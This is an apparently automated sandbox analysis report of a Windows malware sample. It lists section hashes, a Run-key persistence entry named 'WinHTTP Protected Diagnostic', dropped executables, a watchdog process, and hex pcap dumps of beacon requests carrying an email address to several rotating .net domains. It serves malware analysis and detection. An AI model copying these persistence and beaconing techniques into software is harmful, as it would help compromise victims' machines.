Analysis Date2014-09-19 04:07:46

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: e1ea0730348877b9d2342f3bbe445cf8 sha1: 268a889478af4c8cae040aedffa3fec36366c1a6 size: 298496
Section.rdata md5: 1ccce4278c9700b5699b52493c9e1ec4 sha1: 25f90134d1395113938e7a6e80eb7aad536f97b7 size: 34304 md5: 3224b537ca680234073a573dd835d7cd sha1: cb931ccbe94b1aa5c004841f376dd0983bc9552c size: 101376
Timestamp2014-07-24 05:35:11
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WinHTTP Protected Diagnostic ➝
C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe

↳ C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.ydqsr
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\zuzhhyvafzai.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\cegzqbmqpxk\nzoktywiibt.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝
Flows TCP192.168.1.1:1041 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b62   se..Host: thinkb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74626569 6e672e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206368 69656662   se..Host: chiefb
0x00000070 (00112)   65696e67 2e6e6574 0d0a0d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207477 656c7665   se..Host: twelve
0x00000070 (00112)   666f7265 7665722e 6e65740d 0a0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206869 73746f72   se..Host: histor
0x00000070 (00112)   79666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207765 61746865   se..Host: weathe
0x00000070 (00112)   72666f72 65766572 2e6e6574 0d0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636c 61737362   se..Host: classb
0x00000070 (00112)   65796f6e 642e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207468 696e6b66   se..Host: thinkf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0a0d0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a207072 6573656e   se..Host: presen
0x00000070 (00112)   74666c6f 7765722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a20636f 6c6c6567   se..Host: colleg
0x00000070 (00112)   65636f72 6e65722e 6e65740d 0a0d0a0a
0x00000080 (00128)                                         

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d636f6c 6c65656e 2e6f6c69   mail=colleen.oli
0x00000020 (00032)   76657240 65726f6c 732e636f 6d266d65
0x00000030 (00048)   74686f64 3d706f73 74204854 54502f31   thod=post HTTP/1
0x00000040 (00064)   2e300d0a 41636365 70743a20 2a2f2a0d   .0..Accept: */*.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000060 (00096)   73650d0a 486f7374 3a206f66 74656e66   se..Host: oftenf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0d0a0a
0x00000080 (00128)                                         

00-+ CC
         (((((                  H
         h((((                  H
